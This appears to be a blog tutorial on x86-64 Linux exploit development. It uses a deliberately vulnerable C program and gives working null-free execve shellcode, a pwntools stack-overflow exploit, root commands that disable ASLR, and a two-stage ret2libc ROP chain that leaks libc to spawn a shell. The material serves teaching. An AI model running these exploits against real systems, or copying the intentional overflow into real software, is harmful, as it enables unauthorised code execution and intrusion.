Exploit Development 101

In today’s post we’re gonna walk through exploit development on x86-64 Linux from the ground up. We’ll start with a basic stack overflow, write shellcode, pop a shell, then watch every mitigation kill our exploit one by one. Then we bypass them.

The old-school 32-bit stuff still gets taught everywhere, but the reality is almost nobody’s running 32-bit anymore. The calling conventions are different, the syscall interface is different, the mitigations are different. Is this the most advanced exploitation technique out there? No. But if you don’t understand what’s happening at this level, you ain’t gonna understand anything that comes after it. This is the foundation everything else builds on.

Before we break anything, we need to know what we’re breaking. A process on Linux has its virtual memory laid out roughly like this:

high addresses
+------------------+
|      stack       |  <- grows DOWN (toward lower addresses)
|        |         |
|        v         |
|                  |
|        ^         |
|        |         |
|      heap        |  <- grows UP (malloc, ...)
+------------------+
|      .bss        |  <- uninitialized globals
+------------------+
|      .data       |  <- initialized globals
+------------------+
|      .text       |  <- your code (instructions)
+------------------+
low addresses

The stack is where function calls live. Every time you call a function, a new stack frame gets pushed. That frame contains the function’s local variables, the saved base pointer (RBP) so the caller’s frame can be restored, and the return address, where execution continues after the function returns.

On x86-64, the key registers:

Register	Purpose
RIP	Instruction pointer; address of the next instruction to execute
RSP	Stack pointer; points to the top of the stack
RBP	Base pointer; points to the base of the current stack frame
RAX	Return value; also used for syscall number
RDI, RSI, RDX, RCX, R8…	Function arguments (in order)

This is the System V AMD64 ABI calling convention. Function arguments go in registers, not on the stack like 32-bit x86. This matters a lot for exploit dev because it means we can’t just throw arguments on the stack and hope the function picks them up. We need to load registers explicitly, which is where ROP gadgets come in later.

When vuln() gets called, the stack frame looks like:

        low addresses
        +------------------+
RSP --> |   buf[64]        |  <- local buffer (64 bytes)
        +------------------+
        |   saved RBP      |  <- 8 bytes (64-bit)
        +------------------+
        |   return address |  <- 8 bytes. THIS is our target
        +------------------+
        |   caller's frame |
        +------------------+
        high addresses

If we write more than 64 bytes into buf, we overflow into the saved RBP (8 bytes), and then into the return address. Control that return address, control execution. That’s the whole game.

#include <stdio.h>
#include <unistd.h>

void vuln() {
    char buf[64];
    printf("buf @ %p\n", buf);
    read(0, buf, 256);  // reads up to 256 bytes into a 64-byte buffer
}

int main() {
    vuln();
    printf("returned normally\n");
    return 0;
}

read() will happily write 256 bytes into a 64-byte buffer. Classic overflow. Depending on your GCC version and flags, the compiler may warn you about it, and we’re gonna ignore all of it.

Compile with all protections off:

$ gcc -o vuln vuln.c -fno-stack-protector -z execstack -no-pie -g

What those flags do:

flag	what it disables
`-fno-stack-protector`	stack canaries
`-z execstack`	NX (makes stack executable)
`-no-pie`	PIE/ASLR for the binary
`-g`	adds debug symbols

Also disable system-wide ASLR:

# echo 0 > /proc/sys/kernel/randomize_va_space

Normal run:

$ echo "AAAA" | ./vuln
buf @ 0x7ffffffc3b20
returned normally

Overflow:

$ python3 -c "import sys; sys.stdout.buffer.write(b'A'*80)" | ./vuln
Segmentation fault

Dead. We wrote past the buffer and trashed the return address, so the function tried to return to 0x4141414141414141. That’s not a valid address (it isn’t even canonical on x86-64, so the ret instruction itself faults), and the process crashed. But what if we put a real address there? The buffer is 64 bytes. Saved RBP is 8 bytes. So the return address starts at offset 72 from the start of the buffer.
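The offset arithmetic can be sketched in a few lines of plain Python. This is only an illustration of the layout: the target address is a made-up placeholder, and the 72-byte figure assumes the compiler placed buf directly below the saved RBP with no padding in between.

```python
import struct

BUF_SIZE = 64        # char buf[64]
SAVED_RBP_SIZE = 8   # saved base pointer on x86-64

# Offset of the return address from the start of buf,
# assuming no compiler padding between buf and the saved RBP.
RET_OFFSET = BUF_SIZE + SAVED_RBP_SIZE


def build_payload(target: int) -> bytes:
    """Padding up to the return address, then the 8-byte little-endian target."""
    return b"A" * RET_OFFSET + struct.pack("<Q", target)


PLACEHOLDER_TARGET = 0x401136   # hypothetical address, for illustration only
payload = build_payload(PLACEHOLDER_TARGET)
print(RET_OFFSET, len(payload), payload[RET_OFFSET:].hex())
```

The last 8 bytes of the payload are the only ones that matter for control flow; everything before them is filler.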

We can confirm this with pwntools. The idea is simple: try different offsets, overwrite the return address with the address of main(), and see which offset makes the program loop back instead of crashing:

from pwn import *
context.arch = "amd64"

elf = ELF("./vuln", checksec=False)

for off in range(64, 96, 8):
    p = process("./vuln")
    p.recvuntil(b"buf @ ")
    p.recvline()
    # `off` bytes of padding, then main() where we hope the return address is
    payload = b"A" * off + p64(elf.symbols["main"])
    p.sendline(payload)
    try:
        resp = p.recv(timeout=2)
    except EOFError:
        resp = b""  # process died before printing anything else
    p.close()
    if b"buf @" in resp:
        # vuln() ran a second time, so the return landed in main()
        print(f"offset {off}: redirected to main()")
        break
    print(f"offset {off}: crash")

offset 64: crash
offset 72: redirected to main()

Offset 72. We overwrote the return address with the address of main(), and the program looped back instead of dying. That’s RIP control.
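Brute-forcing offsets works, but the usual shortcut is a pattern where every chunk is unique, so whatever value ends up in the return address tells you where it came from. pwntools ships cyclic() and cyclic_find() for this. Below is a simplified stand-in using only the standard library; the helper names are made up for this sketch, and it only works when the overwritten slot sits at a multiple of 8 bytes from the start of the buffer, as it does here.

```python
import struct


def make_pattern(length: int) -> bytes:
    """Fill `length` bytes with 8-byte slots; each slot is 'P' + its own 7-digit offset."""
    slots = [f"P{off:07d}".encode() for off in range(0, length, 8)]
    return b"".join(slots)[:length]


def find_offset(value: int) -> int:
    """Recover the buffer offset from the 8-byte value seen at the return address."""
    raw = struct.pack("<Q", value)   # undo the little-endian load
    return int(raw[1:].decode())     # drop the 'P' marker, parse the digits


pattern = make_pattern(96)

# Pretend a debugger showed these 8 bytes sitting in the return address slot:
crash_value = struct.unpack("<Q", pattern[72:80])[0]
print(find_offset(crash_value))
```

In a real session you would send the pattern as input, read the 8 bytes at the top of the stack when the ret faults, and feed that value to find_offset().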

Writing x86-64 Shellcode

This is where 32-bit and 64-bit diverge hard. On 32-bit x86, you’d use int 0x80 with syscall numbers in EAX and args in EBX/ECX/EDX. On x86-64, everything changes:

what	32-bit (x86)	64-bit (x86-64)
syscall instruction	int 0x80	syscall
syscall number	EAX	RAX
arg 1	EBX	RDI
arg 2	ECX	RSI
arg 3	EDX	RDX
execve number	11	59 (0x3b)

If you try to use 32-bit syscall conventions on a 64-bit system, it’ll technically work (the kernel still supports int 0x80 for backwards compat), but you’ll be going through the 32-bit compat syscall path, which truncates arguments to 32 bits. A 64-bit stack pointer won’t survive that. Don’t do it. Use syscall.

We want execve("/bin/sh", NULL, NULL). In assembly:

; x86-64 execve("/bin/sh", NULL, NULL) - null-free shellcode
; 28 bytes

section .text
global _start

_start:
    xor    rdx, rdx                    ; rdx = 0 (envp = NULL)
    xor    rsi, rsi                    ; rsi = 0 (argv = NULL)
    push   rsi                         ; push null terminator onto stack
    mov    rdi, 0x68732f2f6e69622f     ; "/bin//sh" in little-endian
    push   rdi                         ; push string onto stack
    mov    rdi, rsp                    ; rdi = pointer to "/bin//sh\0"
    xor    rax, rax
    mov    al, 0x3b                    ; syscall 59 = execve
    syscall

Let’s break down the tricks:

xor reg, reg zeros a register without producing null bytes. mov rax, 0 would assemble to something like 48 c7 c0 00 00 00 00, seven bytes with four nulls (the exact encoding depends on the assembler, but the zero immediate brings nulls with it either way). xor rax, rax is 48 31 c0, three bytes, zero nulls.
We use "/bin//sh" instead of "/bin/sh" because it’s exactly 8 bytes, so it fits in a single 64-bit register. The kernel treats repeated slashes as one, so /bin//sh resolves the same as /bin/sh.
mov al, 0x3b instead of mov rax, 59 because we already zeroed RAX with xor, so we only need to set the low byte. Avoids nulls.
The string goes on the stack via push. No data segment needed: the shellcode is fully self-contained.
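If the magic constant in the mov looks arbitrary, it can be checked with the standard library. This is just a sanity check of the byte order, not part of the exploit.

```python
import struct

IMM = 0x68732f2f6e69622f   # immediate from the `mov rdi, ...` instruction

# How the value sits in memory once it has been pushed (little-endian).
as_bytes = struct.pack("<Q", IMM)
print(as_bytes)

# Going the other way: derive the immediate from the path string.
path = b"/bin//sh"
assert len(path) == 8      # must fill exactly one 64-bit register
print(hex(struct.unpack("<Q", path)[0]))
```

The same two lines work for any 8-byte string you want to push in one go.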

Assemble and extract:

$ nasm -f elf64 shell.asm -o shell.o
$ ld -o shell shell.o
$ objcopy -O binary -j .text shell shell.bin
$ xxd shell.bin
00000000: 4831 d248 31f6 5648 bf2f 6269 6e2f 2f73  H1.H1.VH./bin//s
00000010: 6857 4889 e748 31c0 b03b 0f05            hWH..H1..;..

28 bytes. Null-free. Let’s verify it actually works:

$ ./shell
$ id
uid=0(root) gid=0(root) groups=0(root)

The shellcode as a byte string:

\x48\x31\xd2\x48\x31\xf6\x56\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73
\x68\x57\x48\x89\xe7\x48\x31\xc0\xb0\x3b\x0f\x05
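Before using a blob like this, it’s worth checking it mechanically instead of eyeballing the hex dump. The sketch below rebuilds the 28 bytes from the dump above and scans for forbidden bytes; bad_bytes() is a hypothetical helper written for this post. In our target, read() copies null bytes without complaint, so null-free only becomes essential when the bug is a string copy such as strcpy().

```python
# The shellcode from the xxd dump, split per instruction for readability.
shellcode = bytes.fromhex(
    "4831d2"                # xor rdx, rdx
    "4831f6"                # xor rsi, rsi
    "56"                    # push rsi
    "48bf2f62696e2f2f7368"  # mov rdi, "/bin//sh"
    "57"                    # push rdi
    "4889e7"                # mov rdi, rsp
    "4831c0"                # xor rax, rax
    "b03b"                  # mov al, 0x3b
    "0f05"                  # syscall
)


def bad_bytes(blob: bytes, forbidden: bytes = b"\x00") -> list:
    """Return the sorted set of forbidden byte values that occur in blob."""
    return sorted({b for b in blob if b in forbidden})


print(len(shellcode), bad_bytes(shellcode))
```

Pass a longer forbidden set (for example b"\x00\x0a") if the input path also chokes on newlines.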

Now we put it together. We place the shellcode at the start of the buffer, pad to 72 bytes, then overwrite the return address with the address of buf itself. When the function returns, RIP jumps to our buffer and executes the shellcode.

"""
[shellcode (28 bytes)] [NOP padding (44 bytes)] [return addr -> buf (8 bytes)]
     ^                                               |
     |_______________________________________________|
"""

from pwn import *
context.arch = "amd64"

shellcode = (
    b"\x48\x31\xd2\x48\x31\xf6\x56\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73"
    b"\x68\x57\x48\x89\xe7\x48\x31\xc0\xb0\x3b\x0f\x05"
)

OFFSET = 72

p = process("./vuln")
p.recvuntil(b"buf @ ")
buf_addr = int(p.recvline().strip(), 16)

payload  = shellcode                           # 28 bytes
payload += b"\x90" * (OFFSET - len(shellcode)) # 44 bytes NOP padding
payload += p64(buf_addr)                       # 8 bytes -> jump to buf

log.info(f"buf @ {hex(buf_addr)}")
p.sendline(payload)
p.interactive()

Root shell. The program was supposed to read some input and return. Instead it’s running /bin/sh with whatever privileges the binary has.

[*] buf @ 0x7ffffffc3ab0
[*] payload: 28b sc + 44b nops + 8b ret -> 0x7ffffffc3ab0
[+] got shell:
    uid=0(root) gid=0(root) groups=0(root)

This is the baseline. This is how it worked in the early 2000s. Now let’s see why this doesn’t cut it anymore. Compile the same program with modern defaults and our exploit dies in multiple ways. Let’s go through them one at a time.

NX (No-eXecute)

$ gcc -o vuln_nx vuln.c -fno-stack-protector -no-pie

NX marks the stack as non-executable. Our shellcode lands on the stack, the CPU tries to execute it, and the hardware says no. Process killed. This is enforced at the hardware level via the NX bit in the page table entries. You can’t software your way around it.

  buf @ 0x7ffffffc39d0
  process killed

The shellcode is there in memory, sitting right where we put it. But the page permissions won’t let it run.

Stack Canaries

$ gcc -o vuln_canary vuln.c -fstack-protector-all -z execstack -no-pie

The compiler inserts a random value (the “canary”) between the local variables and the saved RBP/return address. Before the function returns, it checks if the canary was modified. If it was, the overflow is detected and the process aborts.

The stack frame now looks like:

+------------------+
|   buf[64]        |
+------------------+
|   canary (8b)    |  <- random value, checked before return
+------------------+
|   saved RBP      |
+------------------+
|   return address |
+------------------+

To overflow into the return address, you have to overwrite the canary. The check catches it. Game over. Unless you can leak the canary value first, but that’s a different conversation.
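Here is a toy model of that check in Python. It is not how the compiler or glibc implements it; the frame is just a bytearray laid out like the diagram, and the canary is a random 8-byte value with a zero low byte (real Linux canaries also keep the low byte zero).

```python
import os

BUF_SIZE = 64


def make_frame(canary: bytes) -> bytearray:
    """Toy frame, low to high: buf | canary | saved RBP | return address."""
    return bytearray(BUF_SIZE) + bytearray(canary) + bytearray(8) + bytearray(8)


def overflow(frame: bytearray, data: bytes) -> None:
    """Model an unchecked write that starts at buf[0]."""
    n = min(len(data), len(frame))
    frame[:n] = data[:n]


def canary_intact(frame: bytearray, canary: bytes) -> bool:
    """The comparison the compiler-inserted epilogue does before returning."""
    return bytes(frame[BUF_SIZE:BUF_SIZE + 8]) == canary


canary = b"\x00" + os.urandom(7)   # toy value for this sketch

safe = make_frame(canary)
overflow(safe, b"A" * 64)          # fills buf exactly, canary untouched

smashed = make_frame(canary)
overflow(smashed, b"A" * 88)       # runs through canary, saved RBP, return address

print(canary_intact(safe, canary), canary_intact(smashed, canary))
```

Note that the return address now sits at offset 80 instead of 72, and there is no way to reach it with a linear overflow without passing through the canary first.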

ASLR (Address Space Layout Randomization)

# echo 2 > /proc/sys/kernel/randomize_va_space

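ASLR randomizes the base addresses of the stack, heap, and shared libraries every time the program runs. Our exploit got away with reading buf’s address from the program’s own output; take that leak away and any hardcoded return address is now wrong: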

  run 1: buf @ 0x7ffffffc3aa0
  run 2: buf @ 0x7ffffffc3bb0
  run 3: buf @ 0x7ffffffc39d0
  run 4: buf @ 0x7ffffffc3ad0
  run 5: buf @ 0x7ffffffc3a00
  -> address changes every run. hardcoded ret addr = crash

PIE (Position Independent Executable)

PIE randomizes the base address of the binary itself. Now even the addresses of functions in the binary (main, vuln, PLT entries) change every run. Combined with ASLR, nothing has a fixed address.

Full RELRO

Full RELRO makes the Global Offset Table (GOT) read-only after the dynamic linker resolves all symbols. This prevents GOT overwrite attacks, where you’d replace a function pointer in the GOT to redirect execution.

What the Defaults Look Like

Compile with zero flags on Ubuntu 22.04:

$ gcc -o vuln vuln.c
$ checksec vuln

RELRO:      Full RELRO
Stack:      Canary found
NX:         NX enabled
PIE:        PIE enabled
SHSTK:      Enabled
IBT:        Enabled

Everything is on by default. SHSTK (Shadow Stack) and IBT (Indirect Branch Tracking) are Intel CET features, hardware-level control flow integrity. Shadow stack keeps a separate copy of return addresses that the attacker can’t touch. IBT requires indirect jumps and calls to land on endbr64 instructions, which limits where you can redirect execution. Note that checksec only reports that the binary is marked CET-compatible; whether either feature is actually enforced depends on the CPU, kernel, and libc.
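The shadow stack idea is easy to model. The sketch below is a toy, not a description of the hardware: ToyCPU and ShadowStackViolation are made-up names, and the only point is that a return address overwritten on the regular stack no longer matches the protected copy.

```python
class ShadowStackViolation(Exception):
    """Raised when the two copies of a return address disagree."""


class ToyCPU:
    def __init__(self):
        self.stack = []    # regular stack: the overflow can scribble on this
        self.shadow = []   # shadow stack: out of reach of ordinary writes

    def call(self, return_addr: int) -> None:
        self.stack.append(return_addr)
        self.shadow.append(return_addr)

    def ret(self) -> int:
        addr = self.stack.pop()
        expected = self.shadow.pop()
        if addr != expected:
            raise ShadowStackViolation(f"{addr:#x} != {expected:#x}")
        return addr


cpu = ToyCPU()
cpu.call(0x401200)                 # hypothetical return address
clean_return = cpu.ret()           # untouched return address passes the check

cpu.call(0x401200)
cpu.stack[-1] = 0x41414141         # model the overflow hitting the return address
try:
    cpu.ret()
    blocked = False
except ShadowStackViolation:
    blocked = True

print(hex(clean_return), blocked)
```

Every ret in a ROP chain would trip this comparison, which is why shadow stacks hit return-oriented techniques so hard.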

Our classical exploit is dead six different ways. Time to evolve.

Bypassing NX with ret2libc

If we can’t execute code on the stack, we use code that already exists in memory. libc is loaded into every dynamically linked process and contains system(), which executes shell commands. If we can call system("/bin/sh"), we get a shell without any shellcode on the stack.

The problem: on x86-64, function arguments go in registers, not on the stack. We can’t just place "/bin/sh" on the stack and hope system() picks it up. We need to load the address of "/bin/sh" into RDI before calling system().

This is where ROP gadgets come in. A gadget is a short sequence of instructions ending in ret that we can chain together by placing addresses on the stack. Each ret pops the next address off the stack and jumps to it, creating a chain of execution. The gadget we need:

/* pop rdi ; ret ; pops the next value from the stack into RDI, then returns */
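To see how a chain of ret instructions turns stack data into a function call with an argument, here is a tiny interpreter in Python. All addresses are hypothetical and the model knows only three things: a pop rdi; ret gadget, a bare ret, and a function called system.

```python
# Hypothetical addresses, chosen only for this toy model.
POP_RDI, RET, SYSTEM, BINSH = 0x1000, 0x1001, 0x2000, 0x3000

GADGETS = {POP_RDI: "pop rdi; ret", RET: "ret", SYSTEM: "system"}


def run_chain(stack):
    """Walk the stack the way a chain of `ret` instructions would."""
    rdi = None
    sp = 0                               # index of the overwritten return address
    while sp < len(stack):
        target = GADGETS[stack[sp]]      # ret: pop an address and jump to it
        sp += 1
        if target == "pop rdi; ret":
            rdi = stack[sp]              # pop rdi: next stack word lands in RDI
            sp += 1
        elif target == "system":
            return ("system", rdi)       # function entered with our argument
        # a bare "ret" does nothing except move on to the next address
    return (None, rdi)


chain = [RET, POP_RDI, BINSH, SYSTEM]
print(run_chain(chain))
```

The attacker never executes a byte of their own code here. The stack is just a list of addresses and data, and the gadgets already in memory do the work.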

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

void setup() {
    setvbuf(stdout, NULL, _IONBF, 0);
    setvbuf(stdin, NULL, _IONBF, 0);
}

// provides ROP gadgets in the binary
void __attribute__((used)) gadgets() {
    asm volatile(
        "pop %rdi; ret\n"
        "pop %rsi; pop %r15; ret\n"
    );
}

void vuln() {
    char buf[64];
    puts("give me input:");
    read(0, buf, 256);
}

int main() {
    setup();
    vuln();
    return 0;
}

A note on the gadgets() function: binaries built against recent glibc (2.34 and later) no longer carry the classic __libc_csu_init that used to provide free ROP gadgets in every binary. Back in the day you’d get pop rdi; ret for free in basically every ELF. Not anymore. In real-world exploitation you’d find gadgets in libc or other loaded libraries using ROPgadget or ropper. Here we embed them for clarity.

Compile with NX on, no canary, no PIE:

$ gcc -o vuln2 vuln2.c -fno-stack-protector -no-pie -fcf-protection=none

$ checksec vuln2
RELRO:      Partial RELRO
Stack:      No canary found
NX:         NX enabled
PIE:        No PIE (0x400000)

Find our gadgets:

$ ROPgadget --binary vuln2 | grep "pop rdi"
0x000000000040118d : pop rdi ; ret

The Two-Stage Exploit

This exploit works in two stages. Why two? Because we need to know where libc is loaded in memory, and we don’t know that until runtime.

Stage 1: call puts(puts@GOT). The GOT entry for puts contains its runtime address in libc. By printing it, we learn where libc is loaded. Then we return to main() so we get a second input.

Stage 2: call system("/bin/sh"). Now that we know libc’s base address, we calculate the addresses of system() and the "/bin/sh" string in libc, and build a ROP chain to call system("/bin/sh").
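One detail of the leak is worth spelling out: puts() prints bytes until it hits a null, so a userland address like 0x00007fff... comes back as only 6 bytes plus a newline. The sketch below shows the padding step with the standard library. parse_leak() is a hypothetical helper, and the sample bytes correspond to the puts address in this post’s sample output.

```python
import struct


def parse_leak(line: bytes) -> int:
    """Turn the raw bytes printed by puts() into a 64-bit address."""
    raw = line[:-1] if line.endswith(b"\n") else line   # puts() appends a newline
    if len(raw) > 8:
        raise ValueError("more than 8 bytes leaked; not a single pointer")
    # The top bytes were zero, so puts() never printed them: pad them back.
    return struct.unpack("<Q", raw.ljust(8, b"\x00"))[0]


sample = bytes.fromhex("505e61ffff7f") + b"\n"
print(hex(parse_leak(sample)))
```

Stripping exactly one trailing newline, rather than all whitespace, avoids eating address bytes that happen to look like whitespace.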

The stack layouts:

stage 1:                          stage 2:
+------------------+              +------------------+
| "A" * 72         |              | "A" * 72         |
+------------------+              +------------------+
| pop rdi; ret     |              | ret              |  <- stack alignment
+------------------+              +------------------+
| puts@GOT         |              | pop rdi; ret     |
+------------------+              +------------------+
| puts@PLT         |              | "/bin/sh" addr   |
+------------------+              +------------------+
| main             |              | system()         |
+------------------+              +------------------+

That ret gadget before pop rdi in stage 2 is for stack alignment. The System V ABI requires the stack to be 16-byte aligned before a call instruction. Without it, system() will segfault on a movaps instruction inside libc. This trips up a lot of people. If your ROP chain segfaults for no obvious reason, try adding a ret gadget before the function call.
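The alignment rule is just arithmetic on RSP, so it can be checked on paper or in Python. The sketch assumes vuln() was entered through a normal call, which means the slot holding its return address sits at an address ending in 8 (mod 16). The concrete address is made up.

```python
def rsp_at_entry(ret_slot: int, words_before_target: int) -> int:
    """RSP when the target function starts executing.

    ret_slot: address of the overwritten return address.
    words_before_target: 8-byte chain entries that precede the function's address.
    """
    # Every earlier entry is consumed by a ret or a pop, then the final ret
    # pops the function's own address.
    return ret_slot + 8 * (words_before_target + 1)


def abi_aligned(rsp: int) -> bool:
    """At function entry the ABI expects rsp + 8 to be a multiple of 16."""
    return (rsp + 8) % 16 == 0


RET_SLOT = 0x7ffffffde018   # hypothetical; ends in 8 as it would after a normal call

without_ret = rsp_at_entry(RET_SLOT, 2)   # [pop rdi][binsh][system]
with_ret = rsp_at_entry(RET_SLOT, 3)      # [ret][pop rdi][binsh][system]
print(abi_aligned(without_ret), abi_aligned(with_ret))
```

Each extra ret shifts RSP by 8 at the moment system() starts, which is exactly enough to flip between the misaligned and aligned cases.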

The Exploit

from pwn import *
context.arch = "amd64"

elf  = ELF("./vuln2", checksec=False)
libc = ELF("/lib/x86_64-linux-gnu/libc.so.6", checksec=False)

OFFSET  = 72
POP_RDI = 0x40118d
RET     = POP_RDI + 1  # 0x40118e

puts_plt = elf.plt["puts"]
puts_got = elf.got["puts"]
main     = elf.symbols["main"]

# stage 1: leak libc
p = process("./vuln2")
p.recvuntil(b"give me input:\n")

payload  = b"A" * OFFSET
payload += p64(POP_RDI)       # pop rdi; ret
payload += p64(puts_got)      # rdi = puts@GOT (runtime addr of puts)
payload += p64(puts_plt)      # call puts() to print it
payload += p64(main)          # return to main for stage 2

p.send(payload)

leaked = u64(p.recvline().strip().ljust(8, b"\x00"))
libc.address = leaked - libc.symbols["puts"]
system = libc.symbols["system"]
binsh  = next(libc.search(b"/bin/sh"))

log.info(f"leaked puts   @ {hex(leaked)}")
log.info(f"libc base     @ {hex(libc.address)}")
log.info(f"system()      @ {hex(system)}")
log.info(f"/bin/sh        @ {hex(binsh)}")

# stage 2: system("/bin/sh")
p.recvuntil(b"give me input:\n")

payload2  = b"A" * OFFSET
payload2 += p64(RET)          # stack alignment
payload2 += p64(POP_RDI)      # pop rdi; ret
payload2 += p64(binsh)        # rdi = "/bin/sh"
payload2 += p64(system)       # call system()

p.send(payload2)
p.interactive()

[*] leaked puts   @ 0x7fffff615e50
[*] libc base     @ 0x7fffff595000
[*] system()      @ 0x7fffff5e5d70
[*] /bin/sh        @ 0x7fffff76d678

[+] shell popped:
    uid=0(root) gid=0(root) groups=0(root)

No shellcode on the stack. No executable stack needed. We used code that was already in memory. NX is completely irrelevant to this technique.

Bypassing ASLR + NX

Here’s the thing: the same exploit works with ASLR on. The binary itself is not PIE (fixed at 0x400000), so our gadget addresses and PLT/GOT addresses don’t change. Only libc moves around, and we leak its address at runtime. That’s the whole point of the two-stage approach.

# echo 2 > /proc/sys/kernel/randomize_va_space

[*] ret2libc with ASLR ON
[*] binary is no-PIE so code addrs are fixed
[*] but libc is randomized - we leak it at runtime
[*] leaked puts   @ 0x7fffff615e50
[*] libc base     @ 0x7fffff595000
[*] system()      @ 0x7fffff5e5d70
[*] /bin/sh        @ 0x7fffff76d678

[+] ASLR bypassed. shell popped:
    uid=0(root) gid=0(root) groups=0(root)

Simply put, ASLR randomizes where things are loaded, but it doesn’t prevent you from reading those addresses at runtime. If you can leak a single libc address, you can calculate every other address in libc because the offsets between functions are fixed within a given libc version. One leak and the whole thing unravels.
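The "one leak" arithmetic looks like this in plain Python. The three offsets are derived from the sample output in this post (leaked address minus libc base), so they only hold for that particular libc build; with pwntools you would read them from the ELF object instead. resolve() is a hypothetical helper.

```python
# Offsets inside libc, derived from this post's sample output.
# They are specific to that libc build and are assumptions anywhere else.
PUTS_OFFSET   = 0x80e50
SYSTEM_OFFSET = 0x50d70
BINSH_OFFSET  = 0x1d8678


def resolve(leaked_puts: int) -> dict:
    """Compute the libc base and derived addresses from one leaked pointer."""
    base = leaked_puts - PUTS_OFFSET
    if base & 0xfff:
        # Libraries are mapped on page boundaries; anything else means
        # a wrong libc version or a mangled leak.
        raise ValueError("libc base is not page-aligned")
    return {
        "base": base,
        "system": base + SYSTEM_OFFSET,
        "binsh": base + BINSH_OFFSET,
    }


addrs = resolve(0x7fffff615e50)
for name, value in addrs.items():
    print(f"{name:7s} @ {value:#x}")
```

The page-alignment check is a cheap way to catch a mismatched libc before you waste time debugging a chain that jumps into the middle of nowhere.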

As of today, exploitation has gotten significantly harder.

mitigation	what it does	bypass
NX	non-executable stack	ret2libc, ROP
stack canaries	detect overflow before return	info leak to read canary, or don’t overflow past it
ASLR	randomize stack/heap/libc addresses	info leak (format string, partial overwrite, side channel)
PIE	randomize binary base address	info leak for binary addresses too
Full RELRO	GOT is read-only	can’t overwrite GOT entries, use other write targets
CET (SHSTK)	shadow stack for return addresses	still being researched, FineIBT bypass
CET (IBT)	indirect branches must land on `endbr64`	limits gadget availability but doesn’t eliminate ROP

The pattern is that every mitigation makes exploitation harder but not impossible. The game has shifted from “inject and execute shellcode” to “chain together existing code fragments using leaked runtime information.” In practice, that means:

Find a bug (overflow, use-after-free, type confusion)
Turn it into an info leak (defeat ASLR/PIE/canary)
Build a ROP chain or corrupt a function pointer (defeat NX)
Deal with RELRO, CFI, CET as needed

The bar is higher. The bugs are rarer. But the fundamental principle hasn’t changed much: if you control what gets written where, you control execution.